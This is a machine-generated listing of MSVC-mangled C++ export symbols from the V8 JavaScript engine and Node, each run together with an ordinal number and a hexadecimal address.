                                  ?GetAvailableLocales@JSV8BreakIterator@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ61470x1407a7ee0
                                  ?GetBackPointer@MapRef@compiler@internal@v8@@QEBA?AVHeapObjectRef@234@XZ61480x140ddbc80
                                  ?GetBackReferencedObject@Deserializer@internal@v8@@IEAA?AVHeapObject@23@W4SnapshotSpace@23@@Z61490x14060daa0
                                  ?GetBackingStore@ArrayBuffer@v8@@QEAA?AV?$shared_ptr@VBackingStore@v8@@@std@@XZ61500x140a86b30
                                  ?GetBackingStore@SharedArrayBuffer@v8@@QEAA?AV?$shared_ptr@VBackingStore@v8@@@std@@XZ61510x140a86c70
                                  ?GetBailoutIdFromEntry@OSROptimizedCodeCache@internal@v8@@AEAA?AVBailoutId@23@H@Z61520x14075bd60
                                  ?GetBailoutReason@CpuProfileNode@v8@@QEBAPEBDXZ61530x140a86db0
                                  ?GetBaselineExecutionTier@WasmCompilationUnit@wasm@internal@v8@@SA?AW4ExecutionTier@234@PEBUWasmModule@234@@Z61540x1405af200
                                  ?GetBinaryOperationFeedback@FeedbackNexus@internal@v8@@QEBA?AW4BinaryOperationHint@23@XZ61550x1407f7ba0
                                  ?GetBitRepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@@Z61560x140ffe440
                                  ?GetBlockById@Schedule@compiler@internal@v8@@QEAAPEAVBasicBlock@234@VId@5234@@Z61570x1404169b0
                                  ?GetBlockData@FunctionData@Coverage@debug@v8@@QEBA?AVBlockData@234@_K@Z61580x140a86dd0
                                  ?GetBlockStart@InstructionSequence@compiler@internal@v8@@QEBAPEAVInstruction@234@VRpoNumber@234@@Z61590x140e04850
                                  ?GetBoolOption@Intl@internal@v8@@SA?AV?$Maybe@_N@3@PEAVIsolate@23@V?$Handle@VJSReceiver@internal@v8@@@23@PEBD2PEA_N@Z61600x1407edac0
                                  ?GetBottom@FrameSummary@internal@v8@@SA?AV123@PEBVStandardFrame@23@@Z61610x140989730
                                  ?GetBoundFunction@Function@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ61620x140a86e40
                                  ?GetBracketList@ControlEquivalence@compiler@internal@v8@@AEAAAEAV?$ZoneLinkedList@UBracket@ControlEquivalence@compiler@internal@v8@@@34@PEAVNode@234@@Z61630x140fb8640
                                  ?GetBreakLocation@BreakIterator@internal@v8@@QEAA?AVBreakLocation@23@XZ61640x1409c0360
                                  ?GetBreakpoint@WasmInterpreter@wasm@internal@v8@@QEAA_NPEBUWasmFunction@234@_K@Z61650x1405570f0
                                  ?GetBreakpointPc@Thread@WasmInterpreter@wasm@internal@v8@@QEAA_KXZ61660x140076df0
                                  ?GetBuffer@JSTypedArray@internal@v8@@QEAA?AV?$Handle@VJSArrayBuffer@internal@v8@@@23@XZ61670x1407e7dc0
                                  ?GetBufferSize@EhFrameIterator@internal@v8@@QEAAHXZ61680x140448410
                                  ?GetBuild@Version@internal@v8@@SAHXZ61690x14051a690
                                  ?GetBytecodeAnalysis@JSHeapBroker@compiler@internal@v8@@QEAAAEBVBytecodeAnalysis@234@V?$Handle@VBytecodeArray@internal@v8@@@34@VBailoutId@34@_NW4SerializationPolicy@234@@Z61700x140ddbec0
                                  ?GetBytecodeArray@SharedFunctionInfoRef@compiler@internal@v8@@QEBA?AVBytecodeArrayRef@234@XZ61710x140ddc050
                                  ?GetBytecodeDispatchCallDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@AEBVCallInterfaceDescriptor@34@H@Z61720x140e67550
                                  ?GetBytecodeHandler@Interpreter@interpreter@internal@v8@@QEAA?AVCode@34@W4Bytecode@234@W4OperandScale@234@@Z61730x14086a750
                                  ?GetCEntryStubCallDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@HHPEBDV?$Flags@W4Property@Operator@compiler@internal@v8@@E@base@4@V?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@84@@Z61740x140e67750
                                  ?GetCFunctionInfo@CallDescriptor@compiler@internal@v8@@QEBAPEBVCFunctionInfo@4@XZ61750x14029f080
                                  ?GetCWasmEntry@WasmDebugInfo@internal@v8@@SA?AV?$Handle@VCode@internal@v8@@@23@V?$Handle@VWasmDebugInfo@internal@v8@@@23@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@@Z61760x140566670
                                  ?GetCachedNodes@JSGraph@compiler@internal@v8@@QEAAXPEAV?$ZoneVector@PEAVNode@compiler@internal@v8@@@34@@Z61770x140ea6f60
                                  ?GetCallCount@FeedbackNexus@internal@v8@@QEAAHXZ61780x1407f7c50
                                  ?GetCallTargetForFunction@NativeModule@wasm@internal@v8@@QEBA_KI@Z61790x140571130
                                  ?GetCanonicalizedValue@InstructionOperand@compiler@internal@v8@@IEBA_KXZ61800x140453940
                                  ?GetCapture@RegExpParser@internal@v8@@AEAAPEAVRegExpCapture@23@H@Z61810x1406aa1b0
                                  ?GetChecksum@Deserializer@internal@v8@@QEBAIXZ61820x1405fff40
                                  ?GetChild@CpuProfileNode@v8@@QEBAPEBV12@H@Z61830x140a87090
                                  ?GetChild@HeapGraphNode@v8@@QEBAPEBVHeapGraphEdge@2@H@Z61840x140a870c0
                                  ?GetChildCovers@TopLevelLiveRange@compiler@internal@v8@@QEAAPEAVLiveRange@234@VLifetimePosition@234@@Z61850x140ef77f0
                                  ?GetChildrenCount@CpuProfileNode@v8@@QEBAHXZ61860x140a87120
                                  ?GetChildrenCount@HeapGraphNode@v8@@QEBAHXZ61870x140a87130
                                  ?GetChunkSize@OutputStream@v8@@UEAAHXZ61880x140077d60
                                  ?GetClass@ControlEquivalence@compiler@internal@v8@@AEAA_KPEAVNode@234@@Z61890x140fb5db0
                                  ?GetClosureScope@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEBAPEAVDeclarationScope@23@XZ61900x1406fae30
                                  ?GetClosureScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ61910x140a55590
                                  ?GetClosureScope@Scope@internal@v8@@QEBAPEBVDeclarationScope@23@XZ61920x140a55590
                                  ?GetCode@Assembler@internal@v8@@QEAAXPEAVIsolate@23@PEAVCodeDesc@23@@Z61930x1404361c0
                                  ?GetCode@Assembler@internal@v8@@QEAAXPEAVIsolate@23@PEAVCodeDesc@23@PEAVSafepointTableBuilder@23@H@Z61940x1404a10f0
                                  ?GetCode@NativeModule@wasm@internal@v8@@QEBAPEAVWasmCode@234@I@Z61950x140571160
                                  ?GetCode@RegExpBytecodeGenerator@internal@v8@@UEAA?AV?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@@Z61960x1406ca1e0
                                  ?GetCode@RegExpMacroAssemblerX64@internal@v8@@UEAA?AV?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@@Z61970x140445990
                                  ?GetCode@SharedFunctionInfo@internal@v8@@QEBA?AVCode@23@XZ61980x140776600
                                  ?GetCodeEventTypeName@CodeEvent@v8@@SAPEBDW4CodeEventType@2@@Z61990x140a871b0
                                  ?GetCodeFromEntry@OSROptimizedCodeCache@internal@v8@@AEAA?AVCode@23@H@Z62000x14075bd90
                                  ?GetCodeObjectStartFromInnerAddress@CodeObjectRegistry@internal@v8@@QEBA_K_K@Z62010x1408d30f0
                                  ?GetCodePages@Isolate@internal@v8@@QEBAPEAV?$vector@UMemoryRange@v8@@V?$allocator@UMemoryRange@v8@@@std@@@std@@XZ62020x14097e080
                                  ?GetCodeRange@Isolate@v8@@QEAAXPEAPEAXPEA_K@Z62030x140a872b0
                                  ?GetCodeSize@CodeEvent@v8@@QEAA_KXZ62040x140076c20
                                  ?GetCodeStartAddress@CodeEvent@v8@@QEAA_KXZ62050x140076c50
                                  ?GetCodeTarget@AssemblerBase@internal@v8@@IEBA?AV?$Handle@VCode@internal@v8@@@23@_J@Z62060x1409fb060
                                  ?GetCodeTracer@Isolate@internal@v8@@QEAAPEAVCodeTracer@23@XZ62070x14097e090
                                  ?GetCodeTracer@WasmEngine@wasm@internal@v8@@QEAAPEAVCodeTracer@34@XZ62080x14055f3f0
                                  ?GetCodeType@CodeEvent@v8@@QEAA?AW4CodeEventType@2@XZ62090x1402fef40
                                  ?GetColumn@StackFrame@v8@@QEBAHXZ62100x140a872d0
                                  ?GetColumnNumber@CpuProfileNode@v8@@QEBAHXZ62110x140a872e0
                                  ?GetColumnNumber@JSMessageObject@internal@v8@@QEBAHXZ62120x1407b6a60
                                  ?GetColumnNumber@Location@debug@v8@@QEBAHXZ62130x140076a10
                                  ?GetColumnNumber@Location@v8@@QEAAHXZ62140x140076a10
                                  ?GetComment@CodeCommentsIterator@internal@v8@@QEBAPEBDXZ62150x1409fa080
                                  ?GetComment@CodeEvent@v8@@QEAAPEBDXZ62160x140076e10
                                  ?GetCommentSize@CodeCommentsIterator@internal@v8@@QEBAIXZ62170x1409fa0d0
                                  ?GetCommitPageSize@MemoryAllocator@internal@v8@@SA_JXZ62180x1408d3230
                                  ?GetCommonDominator@BasicBlock@compiler@internal@v8@@SAPEAV1234@PEAV1234@0@Z62190x140e42b90
                                  ?GetCommonSamplingInterval@CpuProfilesCollection@internal@v8@@QEBA?AVTimeDelta@base@3@XZ62200x1406d5ca0
                                  ?GetCompareOperationFeedback@FeedbackNexus@internal@v8@@QEBA?AW4CompareOperationHint@23@XZ62210x1407f7ca0
                                  ?GetCompiledModule@WasmModuleObject@v8@@QEAA?AVCompiledWasmModule@2@XZ62220x140a872f0
                                  ?GetConsName@ProfilerListener@internal@v8@@QEAAPEBDPEBDVName@23@@Z62230x1406cca00
                                  ?GetConsName@StringsStorage@internal@v8@@QEAAPEBDPEBDVName@23@@Z62240x1406cd5d0
                                  ?GetConstant@InstructionSequence@compiler@internal@v8@@QEBA?AVConstant@234@H@Z62250x140453990
                                  ?GetConstantAtIndex@BytecodeArrayAccessor@interpreter@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@34@HPEAVIsolate@34@@Z62260x14089a9c0
                                  ?GetConstantAtIndexAsSmi@BytecodeArrayAccessor@interpreter@internal@v8@@QEBA?AVSmi@34@H@Z62270x14089aa70
                                  ?GetConstantForIndexOperand@BytecodeArrayAccessor@interpreter@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@34@HPEAVIsolate@34@@Z62280x14089aac0
                                  ?GetConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KN@Z62290x140894470
                                  ?GetConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KPEBVAstRawString@34@@Z62300x140894480
                                  ?GetConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KPEBVScope@34@@Z62310x140894490
                                  ?GetConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KVAstBigInt@34@@Z62320x1408944a0
                                  ?GetConstructor@MapRef@compiler@internal@v8@@QEBA?AVObjectRef@234@XZ62330x140ddded0
                                  ?GetConstructor@V8HeapExplorer@internal@v8@@SA?AVJSFunction@23@VJSReceiver@23@@Z62340x1406de5f0
                                  ?GetConstructorFeedback@FeedbackNexus@internal@v8@@QEBA?AV?$MaybeHandle@VJSObject@internal@v8@@@23@XZ62350x1407f7d20
                                  ?GetConstructorName@Object@v8@@QEAA?AV?$Local@VString@v8@@@2@XZ62360x140a87400
                                  ?GetConstructorName@V8HeapExplorer@internal@v8@@SA?AVString@23@VJSObject@23@@Z62370x1406de6c0
                                  ?GetContents@ArrayBuffer@v8@@AEAA?AVContents@12@_N@Z62380x140a87430
                                  ?GetContents@ArrayBuffer@v8@@QEAA?AVContents@12@XZ62390x140a87670
                                  ?GetContents@SharedArrayBuffer@v8@@AEAA?AVContents@12@_N@Z62400x140a87690
                                  ?GetContents@SharedArrayBuffer@v8@@QEAA?AVContents@12@XZ62410x140a878d0
                                  ?GetContextForMicrotask@JSReceiver@internal@v8@@SA?AV?$MaybeHandle@VNativeContext@internal@v8@@@23@V?$Handle@VJSReceiver@internal@v8@@@23@@Z62420x1407b70a0
                                  ?GetContextInput@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@@Z62430x14045a7c0
                                  ?GetContextInputCount@OperatorProperties@compiler@internal@v8@@SAHPEBVOperator@234@@Z62440x14045a800
                                  ?GetContinuationPreservedEmbedderData@Context@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ62450x140a87910
                                  ?GetControlInput@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@H@Z62460x14045a820
                                  ?GetCopy@StringsStorage@internal@v8@@QEAAPEBDPEBD@Z62470x1406cd780
                                  ?GetCreationContext@JSReceiver@internal@v8@@QEAA?AV?$Handle@VNativeContext@internal@v8@@@23@XZ62480x1407b7230
                                  ?GetCurrent@Isolate@v8@@SAPEAV12@XZ62490x1404221b0
                                  ?GetCurrentAllocatedBytes@StatsScope@ZoneStats@compiler@internal@v8@@QEAA_KXZ62500x140fb2830
                                  ?GetCurrentAllocatedBytes@ZoneStats@compiler@internal@v8@@QEBA_KXZ62510x140fb28e0
                                  ?GetCurrentContext@Isolate@v8@@QEAA?AV?$Local@VContext@v8@@@2@XZ62520x140a87a00
                                  ?GetCurrentDepth@MicrotasksScope@v8@@SAHPEAVIsolate@2@@Z62530x140a87ab0
                                  ?GetCurrentEnvironment@node@@YAPEAVEnvironment@1@V?$Local@VContext@v8@@@v8@@@Z62540x140249500
                                  ?GetCurrentEventLoop@node@@YAPEAUuv_loop_s@@PEAVIsolate@v8@@@Z62550x140249550
                                  ?GetCurrentMemoryUsage@AccountingAllocator@internal@v8@@QEBA_KXZ62560x140076c50
                                  ?GetCurrentOffset@EhFrameIterator@internal@v8@@QEBAHXZ62570x140448420
                                  ?GetCurrentPlatform@V8@internal@v8@@SAPEAVPlatform@3@XZ62580x14089b710
                                  ?GetCurrentProcessId@OS@base@v8@@SAHXZ62590x14025df60
                                  ?GetCurrentStackPosition@Stack@base@v8@@SAPEAXXZ62600x1405f1d50
                                  ?GetCurrentStackPosition@internal@v8@@YA_KXZ62610x1405f1d50
                                  ?GetCurrentThreadId@OS@base@v8@@SAHXZ62620x1402af020
                                  ?GetCurrentThreadId@ThreadId@internal@v8@@CAHXZ62630x14096c580
                                  ?GetData@ControlEquivalence@compiler@internal@v8@@AEAAPEAUNodeData@1234@PEAVNode@234@@Z62640x140fb8910
                                  ?GetData@Isolate@internal@v8@@QEAAPEAXI@Z62650x1404230a0
                                  ?GetData@Isolate@v8@@QEAAPEAXI@Z62660x140077220
                                  ?GetData@Scheduler@compiler@internal@v8@@AEAAPEAUSchedulerData@1234@PEAVNode@234@@Z62670x140fb8960
                                  ?GetDataFromSnapshotOnce@Context@v8@@AEAAPEA_K_K@Z62680x140a87ad0
                                  ?GetDataFromSnapshotOnce@Isolate@v8@@AEAAPEA_K_K@Z62690x140a87b00
                                  ?GetDataProperty@JSReceiver@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEAVLookupIterator@23@W4AllocationPolicy@23@@Z62700x1407b7380
                                  ?GetDataValue@LookupIterator@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@23@W4AllocationPolicy@23@@Z62710x14079c950
                                  ?GetDaylightSavingsOffsetFromOS@DateCache@internal@v8@@UEAAH_J@Z62720x140676820
                                  ?GetDebugBreak@Bytecodes@interpreter@internal@v8@@SA?AW4Bytecode@234@W45234@@Z62730x14086f3b0
                                  ?GetDebugBreakType@BreakIterator@internal@v8@@AEAA?AW4DebugBreakType@23@XZ62740x1409c0510
                                  ?GetDebugInfo@NativeModule@wasm@internal@v8@@QEAAPEAVDebugInfo@234@XZ62750x140571280
                                  ?GetDebugName@Function@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ62760x140a87b10
                                  ?GetDebugName@OptimizedCompilationInfo@internal@v8@@QEBA?AV?$unique_ptr@$$BY0A@DU?$default_delete@$$BY0A@D@std@@@std@@XZ62770x1409dcb40
                                  ?GetDeclarationScope@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEBAPEAVDeclarationScope@23@XZ62780x1406fae40
                                  ?GetDeclarationScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ62790x140a555c0
                                  ?GetDefaultStrings@Parser@internal@v8@@AEAAXPEAPEBVAstRawString@23@0@Z62800x1406fae50
                                  ?GetDeoptInfos@CpuProfileNode@v8@@QEBAAEBV?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@XZ62810x140451600
                                  ?GetDeoptimizationEntry@CodeGenerator@compiler@internal@v8@@AEAAAEBVDeoptimizationEntry@234@PEAVInstruction@234@_K@Z62820x140e4af10
                                  ?GetDeoptimizationEntry@InstructionSequence@compiler@internal@v8@@QEAAAEBVDeoptimizationEntry@234@H@Z62830x140e048c0
                                  ?GetDeoptimizationEntryCount@InstructionSequence@compiler@internal@v8@@QEBAHXZ62840x1404539e0
                                  ?GetDeoptimizedCodeCount@Deoptimizer@internal@v8@@SAHPEAVIsolate@23@@Z62850x1409b3970
                                  ?GetDetailedStackTrace@Isolate@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V?$Handle@VJSObject@internal@v8@@@23@@Z62860x14097e1a0
                                  ?GetDetails@Descriptor@internal@v8@@QEBA?AVPropertyDetails@23@XZ62870x1404230b0
                                  ?GetDispatchCountersObject@Interpreter@interpreter@internal@v8@@QEAA?AV?$Local@VObject@v8@@@4@XZ62880x14086a7b0
                                  ?GetDisplayName@Function@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ62890x140a87cc0
                                  ?GetEffectInput@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@H@Z62900x14045a8c0
                                  ?GetEffectLevel@InstructionSelector@compiler@internal@v8@@QEBAHPEAVNode@234@@Z62910x140e36fb0
                                  ?GetEhFrame@EhFrameWriter@internal@v8@@QEAAXPEAVCodeDesc@23@@Z62920x1409a5de0
                                  ?GetEmbeddedObject@AssemblerBase@internal@v8@@IEBA?AV?$Handle@VHeapObject@internal@v8@@@23@_K@Z62930x1409fb070
                                  ?GetEmbedder@Version@internal@v8@@SAPEBDXZ62940x14051a6a0
                                  ?GetEmbedderData@Context@v8@@QEAA?AV?$Local@VValue@v8@@@2@H@Z62950x140077290
                                  ?GetEmbedderHeapTracer@Isolate@v8@@QEAAPEAVEmbedderHeapTracer@2@XZ62960x140a87dd0
                                  ?GetEmpty@OrderedHashMap@internal@v8@@SA?AVHeapObject@23@VReadOnlyRoots@23@@Z62970x14075f800
                                  ?GetEmpty@OrderedHashSet@internal@v8@@SA?AVHeapObject@23@VReadOnlyRoots@23@@Z62980x14075f810
                                  ?GetEmptyStateValues@StateValuesCache@compiler@internal@v8@@AEAAPEAVNode@234@XZ62990x140ea8330
                                  ?GetEndColumn@Message@v8@@QEBA?AV?$Maybe@H@2@V?$Local@VContext@v8@@@2@@Z63000x140a87de0
                                  ?GetEndColumn@Message@v8@@QEBAHXZ63010x140a87e00
                                  ?GetEndPosition@Message@v8@@QEBAHXZ63020x140a87f90
                                  ?GetEndTime@CpuProfile@v8@@QEBA_JXZ63030x140a88100
                                  ?GetEnteredContext@Isolate@v8@@QEAA?AV?$Local@VContext@v8@@@2@XZ63040x140a88120
                                  ?GetEnteredOrMicrotaskContext@Isolate@v8@@QEAA?AV?$Local@VContext@v8@@@2@XZ63050x140a881e0
                                  ?GetEntry@IdentityMapBase@internal@v8@@IEAAPEAPEAX_K@Z63060x1405f3380
                                  ?GetEntry@StringsStorage@internal@v8@@AEAAPEAU?$TemplateHashMapEntry@PEAXPEAX@base@3@PEBDH@Z63070x1406cd870
                                  ?GetEntry@V8HeapExplorer@internal@v8@@AEAAPEAVHeapEntry@23@VObject@23@@Z63080x1406de7b0
                                  ?GetEnvironmentIsolateData@node@@YAPEAVIsolateData@1@PEAVEnvironment@1@@Z63090x1402495f0
                                  ?GetException@Module@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ63100x140a88280
                                  ?GetExistingThreadLocal@Thread@base@v8@@SAPEAXH@Z63110x140dbf3e0
                                  ?GetExternalOneByteStringResource@String@v8@@QEBAPEBVExternalOneByteStringResource@12@XZ63120x140a88380
                                  ?GetExternalStringResource@String@v8@@QEBAPEAVExternalStringResource@12@XZ63130x140077080
                                  ?GetExternalStringResourceBase@String@v8@@QEBAPEAVExternalStringResourceBase@12@PEAW4Encoding@12@@Z63140x1400770a0
                                  ?GetExternalStringResourceBaseSlow@String@v8@@AEBAPEAVExternalStringResourceBase@12@PEAW4Encoding@12@@Z63150x140a883d0
                                  ?GetExternalStringResourceSlow@String@v8@@AEBAPEAVExternalStringResource@12@XZ63160x140a88440
                                  ?GetExternallyCompiledFilename@Isolate@internal@v8@@QEBAPEBDH@Z63170x14097e270
                                  ?GetExternallyCompiledFilenameCount@Isolate@internal@v8@@QEBAHXZ63180x14097e290
                                  ?GetExtrasBindingObject@Context@v8@@QEAA?AV?$Local@VObject@v8@@@2@XZ63190x140a88480
                                  ?GetFeedback@FeedbackNexus@internal@v8@@QEBA?AVMaybeObject@23@XZ63200x1404230c0
                                  ?GetFeedback@JSHeapBroker@compiler@internal@v8@@QEBAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z63210x140dde470
                                  ?GetFeedbackExtra@FeedbackNexus@internal@v8@@QEBA?AVMaybeObject@23@XZ63220x140423100
                                  ?GetFeedbackForArrayOrObjectLiteral@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z63230x140dde520
                                  ?GetFeedbackForBinaryOperation@JSHeapBroker@compiler@internal@v8@@QEAA?AW4BinaryOperationHint@34@AEBUFeedbackSource@234@@Z63240x140dde590
                                  ?GetFeedbackForCall@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z63250x140dde5e0
                                  ?GetFeedbackForCompareOperation@JSHeapBroker@compiler@internal@v8@@QEAA?AW4CompareOperationHint@34@AEBUFeedbackSource@234@@Z63260x140dde650
                                  ?GetFeedbackForForIn@JSHeapBroker@compiler@internal@v8@@QEAA?AW4ForInHint@34@AEBUFeedbackSource@234@@Z63270x140dde6a0
                                  ?GetFeedbackForGlobalAccess@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z63280x140dde6f0
                                  ?GetFeedbackForInstanceOf@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z63290x140dde760
                                  ?GetFeedbackForPropertyAccess@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@W4AccessMode@234@V?$Optional@VNameRef@compiler@internal@v8@@@base@4@@Z63300x140dde7d0
                                  ?GetFeedbackForRegExpLiteral@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z63310x140dde860
                                  ?GetFeedbackForTemplateObject@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z63320x140dde8d0
                                  ?GetFeedbackSlotKind@JSHeapBroker@compiler@internal@v8@@QEBA?AW4FeedbackSlotKind@34@AEBUFeedbackSource@234@@Z63330x140dde940
                                  ?GetFieldDescriptorIndex@LookupIterator@internal@v8@@QEBAHXZ63340x14079c920
                                  ?GetFieldIndex@LookupIterator@internal@v8@@QEBA?AVFieldIndex@23@XZ63350x14079c970
                                  ?GetFieldIndexFor@MapRef@compiler@internal@v8@@QEBA?AVFieldIndex@34@VInternalIndex@34@@Z63360x140dde990
                                  ?GetFieldOwnerMap@LookupIterator@internal@v8@@QEBA?AV?$Handle@VMap@internal@v8@@@23@XZ63370x14079c9a0
                                  ?GetFieldType@LookupIterator@internal@v8@@QEBA?AV?$Handle@VFieldType@internal@v8@@@23@XZ63380x14079ca40
                                  ?GetFieldType@MapRef@compiler@internal@v8@@QEBA?AVObjectRef@234@VInternalIndex@34@@Z63390x140ddeaa0
                                  ?GetFilename@WasmModuleSourceMap@wasm@internal@v8@@QEBA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_K@Z63400x14052a900
                                  ?GetFillToAlign@Heap@internal@v8@@SAH_KW4AllocationAlignment@23@@Z63410x1409303e0
                                  ?GetFirstMap@FeedbackNexus@internal@v8@@QEBA?AVMap@23@XZ63420x1407f7e00
                                  ?GetFirstUnusedStackSlot@CallDescriptor@compiler@internal@v8@@QEBAHXZ63430x140e67990
                                  ?GetFixedSlotCount@Frame@compiler@internal@v8@@QEBAHXZ63440x140076a00
                                  ?GetFlag@OptimizedCompilationInfo@internal@v8@@AEBA_NW4Flag@123@@Z63450x140495710
                                  ?GetFlagOperand@BytecodeArrayAccessor@interpreter@internal@v8@@QEBAIH@Z63460x14089ab50
                                  ?GetFlags@RegExp@v8@@QEBA?AW4Flags@12@XZ63470x140a88500
                                  ?GetFlatContent@String@internal@v8@@QEAA?AVFlatContent@123@AEBV?$PerThreadAssertScopeDebugOnly@$0A@$0A@@23@@Z63480x1407484c0
                                  ?GetFloat32RepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@VTruncation@234@@Z63490x140ffe7a0
                                  ?GetFloat64RepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z63500x140ffeab0
                                  ?GetForInFeedback@FeedbackNexus@internal@v8@@QEBA?AW4ForInHint@23@XZ63510x1407f7ee0
                                  ?GetForThread@ThreadTicks@base@v8@@SA?AV123@AEBQEAX@Z63520x140dc3140
                                  ?GetFormatted@StringsStorage@internal@v8@@QEAAPEBDPEBDZZ63530x1406cd8f0
                                  ?GetFrame@StackTrace@v8@@QEBA?AV?$Local@VStackFrame@v8@@@2@PEAVIsolate@2@I@Z63540x140a88510
                                  ?GetFrame@Thread@WasmInterpreter@wasm@internal@v8@@QEAA?AV?$unique_ptr@VInterpretedFrame@wasm@internal@v8@@UInterpretedFrameDeleter@234@@std@@H@Z63550x140557140
                                  ?GetFrameArrayFromStackTrace@internal@v8@@YA?AV?$Handle@VFrameArray@internal@v8@@@12@PEAVIsolate@12@V?$Handle@VFixedArray@internal@v8@@@12@@Z63560x14074d5a0
                                  ?GetFrameCount@StackTrace@v8@@QEBAHXZ63570x14082d830
                                  ?GetFrameCount@Thread@WasmInterpreter@wasm@internal@v8@@QEAAHXZ63580x1405571a0
                                  ?GetFrameStateDescriptor@InstructionSelector@compiler@internal@v8@@AEAAPEAVFrameStateDescriptor@234@PEAVNode@234@@Z63590x140e36fd0
                                  ?GetFrameStateInput@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@@Z63600x14045af60
                                  ?GetFrameStateInputCount@OperatorProperties@compiler@internal@v8@@SAHPEBVOperator@234@@Z63610x14045afc0
                                  ?GetFromNode@HeapGraphEdge@v8@@QEBAPEBVHeapGraphNode@2@XZ63620x140a88740
                                  ?GetFunction@FunctionTemplate@v8@@QEAA?AV?$MaybeLocal@VFunction@v8@@@2@V?$Local@VContext@v8@@@2@@Z63630x140a88770
                                  ?GetFunctionBytes@ModuleWireBytes@wasm@internal@v8@@QEBA?AV?$Vector@$$CBE@34@PEBUWasmFunction@234@@Z63640x140423130
                                  ?GetFunctionData@ScriptData@Coverage@debug@v8@@QEBA?AVFunctionData@234@_K@Z63650x140a88b40
                                  ?GetFunctionDebuggingId@Debug@internal@v8@@QEAAHV?$Handle@VJSFunction@internal@v8@@@23@@Z63660x1409c05d0
                                  ?GetFunctionFromEval@Compiler@internal@v8@@SA?AV?$MaybeHandle@VJSFunction@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VContext@internal@v8@@@23@W4LanguageMode@23@W4ParseRestriction@23@HHH@Z63670x1409f1520
                                  ?GetFunctionFromString@Compiler@internal@v8@@SA?AV?$MaybeHandle@VJSFunction@internal@v8@@@23@V?$Handle@VContext@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4ParseRestriction@23@H@Z63680x1409f1cd0
                                  ?GetFunctionFromValidatedString@Compiler@internal@v8@@SA?AV?$MaybeHandle@VJSFunction@internal@v8@@@23@V?$Handle@VContext@internal@v8@@@23@V?$MaybeHandle@VString@internal@v8@@@23@W4ParseRestriction@23@H@Z63690x1409f1da0
                                  ?GetFunctionIndexFromJumpTableSlot@NativeModule@wasm@internal@v8@@QEBAI_K@Z63700x140571340
                                  ?GetFunctionName@CodeEvent@v8@@QEAA?AV?$Local@VString@v8@@@2@XZ63710x140433500
                                  ?GetFunctionName@CpuProfileNode@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ63720x140a88bb0
                                  ?GetFunctionName@ProfilerListener@internal@v8@@AEAAPEBDVSharedFunctionInfo@23@@Z63730x1406d2850
                                  ?GetFunctionName@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ63740x140a88c10
                                  ?GetFunctionNameStr@CpuProfileNode@v8@@QEBAPEBDXZ63750x140a88e10
                                  ?GetFunctionOffsets@AsmJsOffsetInformation@wasm@internal@v8@@QEAA?AU?$pair@HH@std@@H@Z63760x140528800
